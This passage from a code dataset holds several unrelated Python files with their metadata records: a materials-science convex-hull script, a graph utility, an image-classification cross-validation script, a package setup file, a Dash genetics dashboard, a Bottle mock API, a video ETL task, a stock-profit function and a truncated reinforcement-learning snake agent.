vaspPot.values()\n\nif preload:\n entries = []\n otherPot = []\n for i,rec in enumerate(data):\n if not rec.get(\"code\").startswith(\"vasp\") : continue\n if rec.get(\"dft_type\")!=\"PAW_PBE\" : continue\n spc = rec.get(\"species\").replace(\"'\",\"\").split(\",\")\n if all(elem in within for elem in spc) :\n if allpot: entries.append(rec)\n else:\n elp = rec.get(\"species_pp\").split(\",\")\n if all(elem in runPot for elem in elp) :\n entries.append(rec)\n else:\n for el in elp:\n if el not in runPot:\n if el not in otherPot:\n otherPot.append(el)\n if not allpot: print(\"\\n other Potential found\", otherPot, \"\\n\")\n nentries = len(entries)\n \n for entry in entries:\n try:\n els,composition = formula2nat(entry.get(\"compound\"))\n prettycompound = prety_formula(els,composition)\n if deltaH:\n energy_atom = entry.get(\"enthalpy_formation_atom\")\n if energy_atom is None: continue\n if not isfloat(energy_atom): continue\n \"\"\"\n if (len(els)==1) and (float(energy_atom)<0.0) : \n print(entry)\n continue\n \"\"\"\n else:\n energy_atom = entry.get(\"energy_atom\")\n\n #print(energy_atom)\n link = \"http://\"+entry.get(\"aurl\").replace(\"duke.edu:\",\"duke.edu/\")\n if link in missing_data: continue\n \"\"\"\n ret = requests.head(link)\n if ret.status_code >= 400 : continue #error in AFLOW, link not exist\n \"\"\"\n\n afid = entry[\"auid\"].replace(':','-')\n if ehull <= ehullthr:\n if prettycompound in allrec.keys():\n if float(energy_atom) >= float(allrec.get(prettycompound)[0]) : continue\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound,afid]\n allrec.update({prettycompound:arec})\n else:\n compound_spacegroup = entry.get(\"compound\")+\"_\"+entry.get(\"spacegroup_relax\")\n if compound_spacegroup in allrec.keys():\n if float(energy_atom) >= float(allrec.get(compound_spacegroup)[0]) : continue\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound,afid]\n allrec.update({compound_spacegroup:arec})\n \"\"\"\n else:\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound]\n allrec.update({link:arec})\n \"\"\"\n except:\n traceback.print_exc()\n pass\n\n if deltaH: \n for kk in allrec.keys():\n rr = allrec.get(kk)\n if len(rr[2])==1 :\n rr[0] = -0.000000001\n allrec[kk] = rr\n \"\"\"\n \"\"\"\n\n sys.stdout.write ('{} + {} Secs. 
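# A sketch of the de-duplication rule used in the preload branch above: keep,
# for each pretty formula, only the entry with the lowest energy per atom.
# Toy records, illustrative only.
def keep_lowest(entries):
    best = {}
    for compound, energy in entries:
        if compound not in best or energy < best[compound]:
            best[compound] = energy
    return best

print(keep_lowest([('HfPt', -9.1), ('HfPt', -9.4), ('Hf2Pt', -8.7)]))
# -> {'HfPt': -9.4, 'Hf2Pt': -8.7}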
'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if len(allrec) != 0:\n sys.stdout.write('{} compounds found from {} AFLOW entries\\n'.format(len(allrec),len(data)))\n\n dstack = []\n for kk in allrec.keys():\n line = allrec.get(kk)\n drec = {\"pretty_formula\":line[5], \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"afid\":afid}\n dstack.append(drec)\n hstack,dstack = convexhull(dstack,fastcode)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n outMPdata(posdir, dstack, True, ehull)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if formula_within!=\"\":\n calcphasedecompostion(hstack,formula_within,within,compos_within)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n print(nentries,\" entries processed. Total time cost=\",round(time.time()-startime,3),\"\\n\")\n\nelse:\n for i1,el1 in enumerate(within):\n allrec.update(downloads((K.nspecies == 1) & (K.species==el1)))\n for i2,el2 in enumerate(within):\n if i2 <= i1: continue\n allrec.update(downloads((K.nspecies == 2) & ((K.species==el1) & (K.species==el2))))\n for i3,el3 in enumerate(within):\n if i3 <= i2: continue\n allrec.update(downloads((K.nspecies == 3) & (((K.species==el1) & (K.species==el2)) & (K.species==el3))))\n if not quaternary : continue\n for i4,el4 in enumerate(within):\n if i4 <= i3: continue\n allrec.update(downloads((K.nspecies == 4) & ((((K.species==el1) & (K.species==el2)) & (K.species==el3)) & (K.species==el4))))\n\n dstack = []\n for kk in allrec.keys():\n line = allrec.get(kk)\n #print (line)\n #drec = {\"pretty_formula\":kk, \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"Pearson_symbol\":line[8], \"prototype\":line[9],\"sg2\":line[10][0],\"spacegroup\":line[11]}\n drec = {\"pretty_formula\":kk, \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"Pearson_symbol\":line[8], \"prototype\":line[9],\"sg2\":line[10][0],\"spacegroup\":line[11], \"afid\":line[12].replace(\":\",\"-\")}\n dstack.append(drec)\n\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n hstack,dstack = convexhull(dstack,fastcode)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n outMPdata(posdir, dstack, True, ehull)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if formula_within!=\"\":\n calcphasedecompostion(hstack,formula_within,within,compos_within)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n print(nentries,\" entries processed. 
Total time cost=\",round(time.time()-startime,3),\"\\n\")\n#http://aflowlib.duke.edu/search/API/?species(!Pu),energy_atom,dft_type,$paging(0)\n#http://aflowlib.duke.edu/search/API/?species(!Pu),energy_atom,code,$paging(0)\n#http://aflowlib.duke.edu/AFLOWDATA/LIB3_RAW/CoMg_pvSi/TFCC010.ABChttp://aflowlib.duke.edu/AFLOWDATA/LIB3_RAW/CoMg_pvSi/TFCC010.ABC#http://aflowlib.duke.edu/search/API/?species(!Pu),enthalpy_formation_atom,$paging(0)\n","sub_path":"hbin/pycode/afconvex.py","file_name":"afconvex.py","file_ext":"py","file_size_in_byte":40753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"456229","text":"import fileinput\r\n\r\n\r\nclass DirectedGraph:\r\n def __init__(self):\r\n self.adjIn = [] # adjacency-list of input vertices\r\n self.adjOut = [] # adjacency-list of output vertices\r\n self.index = {} # dictionary to convert symbol to index\r\n self.symbol = [] # array to convert index to symbol\r\n self.V = 0 # count of vertices in graph (including lazy-deleted nodes)\r\n\r\n def addEdge(self, v, w):\r\n if v not in self.index:\r\n self.addVertex(v)\r\n\r\n if w not in self.index:\r\n self.addVertex(w)\r\n\r\n if w in self.adjacentOutOf(v):\r\n return # do not allow parallel edges\r\n\r\n vi = self.index[v]\r\n wi = self.index[w]\r\n\r\n self.adjOut[vi].append(wi)\r\n self.adjIn[wi].append(vi)\r\n\r\n def addVertex(self, v):\r\n if v in self.index:\r\n return\r\n\r\n self.index[v] = self.V\r\n self.symbol.append(v)\r\n self.V += 1\r\n self.adjIn.append([])\r\n self.adjOut.append([])\r\n\r\n def removeVertex(self, v):\r\n vi = self.index.pop(v)\r\n # lazy delete to avoid shifting index values\r\n self.symbol[vi] = None\r\n\r\n for inNeighbor in self.adjIn[vi]:\r\n self.adjOut[inNeighbor].remove(vi)\r\n self.adjIn[vi] = None\r\n\r\n for outNeighbor in self.adjOut[vi]:\r\n self.adjIn[outNeighbor].remove(vi)\r\n self.adjOut[vi] = None\r\n\r\n def adjacentOutOf(self, v):\r\n vi = self.index[v]\r\n return [self.symbol[x] for x in self.adjOut[vi]]\r\n\r\n def adjacentInTo(self, v):\r\n vi = self.index[v]\r\n return [self.symbol[x] for x in self.adjIn[vi]]\r\n\r\n def indegree(self, v):\r\n vi = self.index[v]\r\n return len(self.adjIn[vi])\r\n\r\n def outdegree(self, v):\r\n vi = self.index[v]\r\n return len(self.adjOut[vi])\r\n\r\n def vertices(self):\r\n return self.index.keys()\r\n\r\n def __str__(self):\r\n result = \"\"\r\n for vs in self.vertices():\r\n indegree = self.indegree(vs)\r\n outdegree = self.outdegree(vs)\r\n adjacent = ', '.join(self.adjacentOutOf(vs))\r\n result += \"{} ({}, {}): {}\\n\".format(vs, indegree, outdegree, adjacent)\r\n return result.strip(\"\\n\")\r\n\r\n\r\ndef get(lst, index, default=None):\r\n try:\r\n return lst[index]\r\n except IndexError:\r\n return default\r\n\r\n\r\nclass Remover:\r\n def __init__(self, digraph):\r\n self.digraph = digraph\r\n\r\n verticesToEliminate = []\r\n # must iterate twice to differentiate isolated vertices and vertices that turn isolated after removing adjacent\r\n for vs in digraph.vertices():\r\n if digraph.indegree(vs) == 1 and digraph.outdegree(vs) == 1:\r\n verticesToEliminate.append(vs)\r\n\r\n for vs in verticesToEliminate:\r\n inNeighbor = get(digraph.adjacentInTo(vs), 0, None)\r\n outNeighbor = get(digraph.adjacentOutOf(vs), 0, None)\r\n\r\n digraph.removeVertex(vs)\r\n\r\n if inNeighbor is not outNeighbor:\r\n digraph.addEdge(inNeighbor, outNeighbor)\r\n\r\n\r\ngraph = DirectedGraph()\r\nfor line in fileinput.input():\r\n v, w = line.strip().split('\\t')\r\n 
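# A sketch of the contraction rule Remover implements above: every vertex with
# exactly one incoming and one outgoing edge is removed and its two neighbors
# are joined directly. Plain-dict adjacency lists, illustrative only.
def contract_passthrough(adj_out, adj_in):
    candidates = [v for v in adj_out
                  if len(adj_in[v]) == 1 and len(adj_out[v]) == 1]
    for v in candidates:
        if len(adj_in[v]) != 1 or len(adj_out[v]) != 1:
            continue                   # degree changed by an earlier removal
        src, dst = adj_in[v][0], adj_out[v][0]
        adj_out[src].remove(v)
        adj_in[dst].remove(v)
        if src != dst and dst not in adj_out[src]:
            adj_out[src].append(dst)   # reconnect around the removed node
            adj_in[dst].append(src)
        del adj_out[v], adj_in[v]

adj_out = {'a': ['b'], 'b': ['c'], 'c': []}
adj_in = {'a': [], 'b': ['a'], 'c': ['b']}
contract_passthrough(adj_out, adj_in)
print(adj_out)   # -> {'a': ['c'], 'c': []}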
graph.addEdge(v, w)\r\n\r\nRemover(graph)\r\nfor v in graph.vertices():\r\n for w in graph.adjacentOutOf(v):\r\n print(\"{}\\t{}\".format(v, w))\r\n","sub_path":"mysolution.py","file_name":"mysolution.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308138668","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport time\nimport mylib\nimport PreProcessing as pp\nimport FeatExtraction as fe\nimport SupVecMech as mysvm\n\n\n# 简单画个图\ndef Visualize(num): # 可以尝试在柱状图上带数据\n x = range(6)\n plt.xlim(-1, 6)\n plt.ylim(0.5, 1)\n plt.xticks(range(6), np.linspace(0, 6, 6, dtype=int))\n plt.ylabel(\"Precision\")\n plt.xlabel(\"Group No.\")\n plt.title(\"Precision of Cross-Validation\")\n plt.bar(x, num)\n plt.show()\n\n\n# 生成训练、测试数据集\ndef GenSet(times, iteration):\n print(\"分组:\" + str(times))\n\n coal_prefix = 'D:\\\\coal-gangue\\\\selected\\\\coal\\\\'\n gangue_prefix = 'D:\\\\coal-gangue\\\\selected\\\\gangue\\\\'\n coal_num = 184\n gangue_num = 182\n\n suffix = '.jpg'\n train = []\n label = []\n testset = []\n for i in range(coal_num):\n path = coal_prefix + str(i) + suffix\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n img = pp.prep(img)\n # 这里使用了区域关系重采样做插值\n #img = cv2.resize(img, (150, 150), interpolation=cv2.INTER_AREA)\n if i % iteration != times:\n train.append(fe.Rotation_invariant_LBP(img))\n label.append(\"coal\")\n else:\n t0 = time.time()\n tmp = [i, fe.Rotation_invariant_LBP(img), \"coal\"]\n t1 = time.time()\n tmp.append(t1 - t0)\n testset.append(tmp)\n for i in range(gangue_num):\n path = gangue_prefix + str(i) + suffix\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n img = pp.prep(img)\n # 这里使用了区域关系重采样做插值\n #img = cv2.resize(img, (150, 150), interpolation=cv2.INTER_AREA)\n if i % iteration != times:\n train.append(fe.Rotation_invariant_LBP(img))\n label.append(\"gangue\")\n else:\n t0 = time.time()\n tmp = [i, fe.Rotation_invariant_LBP(img), \"gangue\"]\n t1 = time.time()\n tmp.append(t1 - t0)\n testset.append(tmp)\n print(str(times) + \"分组完成!\")\n return np.asarray(train), np.asarray(label), testset\n\n\n# 计算每一次交叉检验的准确率\ndef CalcPre(clf, test):\n cnt = 0\n for i in range(len(test)):\n tmp = [test[i][0], test[i][2], test[i][3]]\n flag = False\n t0 = time.time()\n if clf.predict([test[i][1]]) == test[i][2]:\n cnt += 1\n flag = True\n t1 = time.time()\n tmp[2] += t1 - t0\n tmp.append(flag)\n mylib.record('418_lbp', tmp)\n print(\"准确率计算完成\")\n return cnt / len(test)\n\n\ndef CrossVld():\n precision = []\n iteration = 6\n for i in range(iteration):\n train, label, testset = GenSet(i, iteration)\n clf = mysvm.Train(train, label)\n precision.append(CalcPre(clf, testset))\n return precision","sub_path":"CrsVldt.py","file_name":"CrsVldt.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"34223413","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nimport re\nimport os\n\n\ndef get_release():\n regexp = re.compile(r\"^__version__\\W*=\\W*'([\\d.abrc]+)'\")\n root = os.path.dirname(__file__)\n init_py = os.path.join(root, 'aiodcard', '__init__.py')\n with open(init_py) as f:\n for line in f:\n match = regexp.match(line)\n if match is not None:\n return match.group(1)\n else:\n raise RuntimeError('Cannot find version in aiodcard/__init__.py')\n\n\nsetup(\n name='aiodcard',\n description='Dcard crawler using asyncio(coroutine)',\n 
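# A sketch of the modulo fold assignment GenSet() above uses for
# cross-validation: sample i lands in the test fold when i % k == fold.
# Indices only; the image loading and LBP feature extraction are omitted.
def fold_indices(n_samples, k, fold):
    train = [i for i in range(n_samples) if i % k != fold]
    test = [i for i in range(n_samples) if i % k == fold]
    return train, test

train, test = fold_indices(12, 6, 0)
print(test)   # -> [0, 6]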
long_description=open('README.rst').read(),\n version=get_release(),\n author='carlcarl',\n author_email='carlcarlking@gmail.com',\n url='https://github.com/carlcarl/aiodcard',\n packages=find_packages(),\n license='MIT',\n package_data={\n },\n entry_points={\n },\n keywords=['dcard', 'crawler', 'coroutine'],\n\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"289794400","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nimport plotly.graph_objects as go\n\nfrom app import app\n\nimport pandas as pd\nimport numpy as np\nimport scipy.stats as stats\nfrom scipy.stats import norm\nfrom statistics import NormalDist\n\ndf1 = pd.read_csv('https://raw.githubusercontent.com/Genes-N-Risks/genocode/master/app/multi_page/Polygenic%20Risk%20Scores%20Data.csv')\n\nscore = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in score.keys():\n score[df1.phenotype[i]].append(df1.score[i])\n else:\n score[df1.phenotype[i]] = []\n score[df1.phenotype[i]].append(df1.score[i])\n\namean = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in amean.keys():\n amean[df1.phenotype[i]].append(df1.means[i])\n else:\n amean[df1.phenotype[i]] = []\n amean[df1.phenotype[i]].append(df1.means[i])\n\nastdev = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in astdev.keys():\n astdev[df1.phenotype[i]].append(df1.sdev[i])\n else:\n astdev[df1.phenotype[i]] = []\n astdev[df1.phenotype[i]].append(df1.sdev[i])\n\ndf = pd.read_csv('Genetic Data.csv')\n\noptions={'BMI':[],\n 'T2D':[]}\n\nfor i in range(df.shape[0]):\n if df.gene[i] in options[df.phenotype[i]]:\n continue\n else:\n options[df.phenotype[i]].append(df.gene[i])\n\nmeans = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in means.keys():\n means[df.gene[i]].append(df.means[i])\n else:\n means[df.gene[i]] = []\n means[df.gene[i]].append(df.means[i])\n\nstdevs = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in stdevs.keys():\n stdevs[df.gene[i]].append(df.sdev[i])\n else:\n stdevs[df.gene[i]] = []\n stdevs[df.gene[i]].append(df.sdev[i])\n\ngenotype = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in genotype.keys():\n genotype[df.gene[i]].append(df.genotype[i])\n else:\n genotype[df.gene[i]] = []\n genotype[df.gene[i]].append(df.genotype[i])\n\nxlabel = {'BMI':'Obesity Genetic Score', 'T2D':'Glucose Genetic Score'}\nylabel = {'BMI':'BMI(kg/m2)', 'T2D':'Fasting glucose(mg/dl)'}\n\nlayout = html.Div([\n html.H3('Statistic data'),\n\n dcc.Dropdown(\n id='disease-dropdown',\n options=[{'label': k, 'value': k} for k in options.keys()],\n value = 'BMI'\n ),\n\n html.Hr(),\n\n dcc.Dropdown(id='snps-dropdown'),\n\n html.Hr(),\n\n\n html.Div(id='stat-display-value'),\n\n dcc.Link('Analyze my own genetic test result', href='consent')\n])\n\n\n@app.callback(\n Output('snps-dropdown', 'options'),\n [Input('disease-dropdown', 'value')])\ndef set_snps_options(selected_disease):\n return [{'label': i, 'value': i} for i in options[selected_disease]]\n\n\n@app.callback(\n 
Output('snps-dropdown', 'value'),\n [Input('snps-dropdown', 'options')])\ndef set_snps_value(available_options):\n return available_options[0]['value']\n\n\n@app.callback(\n Output('stat-display-value', 'children'),\n [Input('disease-dropdown', 'value'),\n Input('snps-dropdown', 'value')])\ndef display_value(disease, snps):\n x1 = np.linspace(means[snps][0] - 3*stdevs[snps][0], means[snps][0] + 3*stdevs[snps][0], 100)\n x2 = np.linspace(means[snps][1] - 3*stdevs[snps][1], means[snps][1] + 3*stdevs[snps][1], 100)\n x3 = np.linspace(means[snps][2] - 3*stdevs[snps][2], means[snps][2] + 3*stdevs[snps][2], 100)\n ol1 = 100*NormalDist(means[snps][0], stdevs[snps][0]).overlap(NormalDist(means[snps][1], stdevs[snps][1]))\n ol1 = round(ol1,1)\n ol2 = 100*NormalDist(means[snps][0], stdevs[snps][0]).overlap(NormalDist(means[snps][2], stdevs[snps][2]))\n ol2 = round(ol2,1)\n return [dcc.Graph(\n figure={\n 'data':[\n {\n 'name': genotype[snps][0],\n 'type': 'line',\n 'x': x1,\n 'y': stats.norm.pdf(x1,means[snps][0], stdevs[snps][0])\n },\n\n {\n 'name': genotype[snps][1],\n 'type': 'line',\n 'x': x2,\n 'y': stats.norm.pdf(x2,means[snps][1], stdevs[snps][1])\n },\n\n {\n 'name': genotype[snps][2],\n 'type': 'line',\n 'x': x3,\n 'y': stats.norm.pdf(x3,means[snps][2], stdevs[snps][2])\n }\n ],\n 'layout': {\n 'title': 'Normal distributions of {} variants'.format(snps),\n 'yaxis':{\n 'title':'Density'\n },\n 'xaxis':{\n 'title':'Polygenic Risk Score'\n }\n }\n }\n ),\n html.H4('Overlap of single mutation {} and wild type {} is {}%'.format(genotype[snps][1],genotype[snps][0],ol1)),\n html.H4('Overlap of double mutation {} and wild type {} is {}%'.format(genotype[snps][2],genotype[snps][0],ol2)),\n html.Br(),\n dcc.Graph(\n figure={\n 'data':[\n {\n 'name': score[disease][k]+'',\n 'type': 'violin',\n 'y': np.random.normal(amean[disease][k], astdev[disease][k], 1000)\n } for k in range(len(score[disease]))\n ],\n 'layout': {\n 'title': 'Polygenic risk scores distributuion of {}'.format(disease),\n 'yaxis':{\n 'title':ylabel[disease]\n },\n 'xaxis':{\n 'title':xlabel[disease]\n }\n }\n }\n )\n ]\n","sub_path":"app/multi_page/apps/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478022821","text":"import json\n\nimport bottle\n\nimport _responses\n\n\nSERIALIZERS = {\n 'application/json': json.dumps,\n }\n\n\napp = bottle.Bottle()\n\n\n@app.get('/marketplaces//accounts/')\ndef marketplace_accounts(mp_eid, ac_eid):\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n the_response = _responses.accounts.show(mp_eid, ac_eid)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.get('/merchants')\ndef merchants_index():\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n the_response = _responses.merchants.index()\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.get('/marketplaces')\ndef marketplaces_index():\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n limit = int(bottle.request.query.limit or 10)\n offset = int(bottle.request.query.offset or 0)\n num = int(bottle.request.query.num or 1)\n pages = 
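# A sketch of the overlap statistic display_value() above reports:
# NormalDist.overlap() (Python 3.8+) returns the shared area, between 0 and 1,
# under two normal densities, which the page then scales to a percentage.
# The means and deviations below are invented.
from statistics import NormalDist

wild_type = NormalDist(mu=25.0, sigma=3.0)
mutant = NormalDist(mu=27.0, sigma=3.5)
print(round(100 * wild_type.overlap(mutant), 1))  # shared area in percent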
int(bottle.request.query.pages or 1)\n the_response = _responses.marketplaces.index(limit, offset, num, pages)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.post('/marketplaces')\ndef marketplaces_create():\n bottle.response.status = 201\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n if not bottle.request.auth:\n the_response = _responses.marketplaces.anonymous_create()\n else:\n the_response = _responses.marketplaces.anonymous_create()\n\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\n@app.put('/marketplaces/<_eid>')\ndef marketplaces_put(_eid):\n return marketplaces_create()\n\n\n@app.post('/api_keys')\ndef api_keys():\n bottle.response.status = 302\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n bottle.response.set_header('Location', '/v1/your-mom')\n bottle.response.body = json.dumps('')\n return bottle.response\n\n\n@app.get('/marketplaces/<_eid>/transactions')\ndef marketplaces_transactions(_eid):\n bottle.response.content_type = (\n bottle.request.headers.get('Accept', 'application/json'))\n serializer = SERIALIZERS[bottle.response.content_type]\n limit = int(bottle.request.query.limit or 10)\n offset = int(bottle.request.query.offset or 0)\n the_response = _responses.transactions.index(limit, offset)\n bottle.response.body = serializer(the_response)\n return bottle.response\n\n\napp.mount('/v1', app)\n","sub_path":"tests/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"158010026","text":"# coding=utf8\n\nimport path\nfrom ..commons.common import MyTask\nfrom .processors import VideoUnfold4Fog\nfrom recognition_pre_fog_batch.etl_video.preparation import ProjParaShop\n\n\nclass VideoETLTask(MyTask):\n \"\"\"\n use the Processor to make task,maybe several Processors are needed!\n we intend to use the Task Object to solve the inter tasks dependency!\n tasks sometimes cost much time and resources!\n This layer try to wrap the Processor to Task,making them to have some more characteristics\n then facilitate the scheduler because of the exposed methods for the scheduler!\n \"\"\"\n def __init__(self, reset=True):\n self.__reset = reset\n self.input = True\n\n def require(self,var):\n \"\"\"\n 本方法执行除execute主体以外的预处理工作。\n 检查当前执行的条件是否满足,其中的主要条件指的是依赖,而不是时机等条件。\n 条件被满足与否,首先要判断存在与否,若存在需要进一步判断条件的特性是否满足处理的要求。\n 执行依赖条件检查,增强程序的稳健性,程序前端入口把关越严,后端需要处理的异常就会降低许多!\n \"\"\"\n p1 = path.Path(ProjParaShop.MODIFIED_VIDEO_PATH)\n p2 = path.Path(ProjParaShop.UNFOLD_VIDEO_SAVE_PATH)\n p1.makedirs_p()\n print(p1)\n p2.makedirs_p()\n if not p1.listdir():\n print(\"输入文件夹是空的,不能继续执行,请满足第一个依赖条件!\")\n self.input = False\n else:\n print(\"输入文件夹是非空,可继续执行,第一个依赖条件满足!\")\n if self.__reset:\n print(\"执行本模块!\")\n self.input = True\n else:\n print(\"不执行本模块!\")\n self.input = False\n\n def output(self, var):\n \"\"\"\n 本方法执行除execute主体以外的善后工作。\n \"\"\"\n print(self.__class__.__name__, \": 任务成功完成!\")\n\n def execute(self, msg):\n \"\"\"\n 程序本体逻辑\n \"\"\"\n if self.input:\n processor = VideoUnfold4Fog(ProjParaShop.MODIFIED_VIDEO_PATH, ProjParaShop.UNFOLD_VIDEO_SAVE_PATH)\n processor.process(msg)\n self.output(None) # 
无条件输出\n\n","sub_path":"resources/recognition_pre_fog/etl_video/tasks_graph.py","file_name":"tasks_graph.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"352968103","text":"\"\"\"\n:Author: Pravallika\n:Description: Say you have an array for which the ith element is the price of a given stock on day i.\n\n\t\tIf you were only permitted to complete at most one transaction (ie, buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n:Explanation: nput: [7, 1, 5, 3, 6, 4]\n\t\tOutput: 5\n\n\t\tmax. difference = 6-1 = 5 (not 7-1 = 6, as selling price needs to be larger than buying price)\n\"\"\"\n\nclass Stocks(object):\n\tdef sellStocks(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tmin = nums[0]\n\t\tmax = 0\n\t\t\n\t\tfor cost in nums:\n\t\t\tif cost < min:\n\t\t\t\tmin = cost\n\t\t\tif cost-min > max:\n\t\t\t\tmax = cost-min\n\n\t\treturn max\n\n\nstock = Stocks()\nnums = [7,1,5,3,6,4]\nprint(stock.sellStocks(nums))\n","sub_path":"Arrays/leetcode/bestTimeSellSticks/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113615906","text":"import random\nfrom NeuralNet.ReinforcementNN import *\nfrom torch.distributions import Categorical\nimport torch\n\n\nclass BrainSnake:\n def __init__(self, _id, gen=-1, width=500, height=500, network_layout=None):\n self.MaxWidth = width\n self.MaxHeight = height\n\n self.head = [50, 50]\n self.body = [[50, 50], [40, 50], [30, 50]]\n self.direction = \"RIGHT\"\n self.direction_map = {1: \"RIGHT\", 2: \"DOWN\", 3: \"LEFT\", 4: \"UP\"}\n self.dirNeural = 0\n self.is_alive = True\n\n self.steps = 0\n self.score = 0\n self.time_to_live = 130\n\n self.threshold = 0.6\n self.scale = 10\n\n self.foodLoc = [-1, -1]\n self.food_on_screen = False\n self.dst_to_food = 0\n\n self.ID = _id\n self.gen = gen\n\n self.brain_input = [0.5] * 11\n self.food_quadrant = [-1, -1]\n self.obstacles = [0] * 8\n self.closest_obstacle = [0] * 8\n self.wall_array = []\n\n self.rewards = []\n self.global_fitness = 0\n\n self.sqrt2 = np.sqrt(2)\n\n self.set_walls()\n self.spawn_food()\n\n self.brain = Policy()\n self.generate_brain_input()\n self.optimizer = optim.Adam(self.brain.parameters(), lr=0.01)\n self.eps = np.finfo(np.float32).eps.item()\n\n def get_head_pos(self):\n return self.head\n\n def get_body(self):\n return self.body\n\n def get_food_pos(self):\n return self.foodLoc\n\n def set_walls(self):\n self.wall_array = []\n for i in range(0, self.MaxHeight, 10):\n self.wall_array.append([-10, i])\n self.wall_array.append([self.MaxWidth, i])\n for i in range(0, self.MaxWidth, 10):\n self.wall_array.append([i, -10])\n self.wall_array.append([i, self.MaxHeight])\n\n def select_action(self):\n probs = self.brain(torch.Tensor(self.brain_input))\n # if (probs[0] > 0 and probs[1] > 0) or (probs[0] <0 and probs[1] < 0):\n m = Categorical(probs)\n action = m.sample([2])\n self.brain.saved_log_probs.append(m.log_prob(action))\n return action\n\n def finish_episode(self):\n R = 0\n policy_loss = []\n rewards = []\n for r in self.brain.rewards[::-1]:\n R = r + 0.99 * R\n rewards.insert(0, R)\n rewards = torch.tensor(rewards)\n print(\" std\",rewards.std())\n rewards = (rewards - rewards.mean()) / (rewards.std() + self.eps)\n print(\"reward\", rewards)\n for log_prob, reward in 
